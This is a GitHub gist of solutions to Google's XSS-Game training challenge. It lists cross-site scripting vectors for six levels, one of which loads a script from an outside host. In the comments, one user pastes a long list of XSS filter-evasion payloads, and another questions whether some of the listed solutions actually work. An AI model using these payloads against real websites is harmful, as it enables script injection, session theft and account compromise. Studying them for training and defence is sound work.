Skip to content

Instantly share code, notes, and snippets.

@djadmin

djadmin/XSS-Game Solutions

Created March 15, 2015 15:31
Show Gist options
  • Star 3 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save djadmin/737a77b87d0bad8a9c79 to your computer and use it in GitHub Desktop.
Save djadmin/737a77b87d0bad8a9c79 to your computer and use it in GitHub Desktop.
Download ZIP
Google's XSS-Game Solutions
Raw
XSS-Game Solutions
Below are the solutions to Google XSS challenges hosted on https://xss-game.appspot.com/
########################## Level 1: Hello, world of XSS ##########################
*** Query ***
https://xss-game.appspot.com/level1/frame?query=<script>alert(1)</script>
*** Vector ***
<script>alert(1)</script>
########################## Level 2: Persistence is key ##########################
*** Vector ***
"><img src=x onerror=alert(1)>
########################## Level 3: That sinking feeling... ##########################
*** Query ***
https://xss-game.appspot.com/level3/frame#'/><script>alert(1)</script>
*** Vector ***
'/><script>alert(1)</script>
########################## Level 4: Context matters ##########################
*** Query ***
https://xss-game.appspot.com/level4/frame?timer=1')%3Balert('1
*** Vector ***
1')%3Balert('1
########################## Level 5: Breaking protocol ##########################
*** Query ***
https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)
*** Vector ***
javascript:alert(1)
########################## Follow the 🐇 ##########################
*** Query ***
https://xss-game.appspot.com/level6/frame#HTTPS://dj-infosec.divshot.io/content.js
*** Vector ***
HTTPS://dj-infosec.divshot.io/content.js
@Konstei
Copy link

Konstei commented Jan 30, 2022

Note: Those aren't the only ways.

For example:

  1. At level 3, you could do something like https://xss-game.appspot.com/level3/frame#1' onerror="alert(1)"; . This would escape into the element of the HTML and use the onerror attribute.
  2. At level 4, you don't have to necessarily use URL encoding, i put into the input section timer}}' + alert(1) + '{{timer and got it right on the first try;

Also: At levels 3 and 6, you don't get any input/textarea element, so i have no damn ideea how you used those "Vector" solutions. As for level 5, something seemed odd to me, as i remembered having tried that "vector" solution, but i tried it again to make sure, and, as expected, it didn't work.

@kumawayo
Copy link

Good good this is link

@Ag3nt47
Copy link

Ag3nt47 commented Nov 25, 2022

@Ag3nt47
Copy link

Ag3nt47 commented Nov 25, 2022

@Ag3nt47
Copy link

Ag3nt47 commented Nov 25, 2022

@Ag3nt47
Copy link

Ag3nt47 commented Nov 25, 2022

"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window'pro'%2B'mpt'")-'
"-eval("window'pro'%2B'mpt'")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>


</scrip</script>t>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'"><\x3Cscript>javascript:alert(1)</script> '"><\x00script>javascript:alert(1)</script>


<script src=1 href=1 onerror="javascript:alert(1)"></script> <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> <iframe src iframe src="javascript:javascript:alert(1)"></iframe src> \x3Cscript>javascript:alert(1)</script> '"`><script>/* *\x2Fjavascript:alert(1)// */</script> <script>javascript:alert(1)javascript:alert(1)javascript:alert(1)

@Ag3nt47
Copy link

Ag3nt47 commented Nov 25, 2022

'-eval("window'pro'%2B'mpt'")-'

@Ag3nt47
Copy link

Ag3nt47 commented Nov 25, 2022

'-eval("window'pro'%2B'mpt'")-'

@Ag3nt47
Copy link

Ag3nt47 commented Nov 25, 2022

'-eval("window'pro'%2B'mpt'")-'

@W1zarDddD
Copy link

Nothing is clear, please explain.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment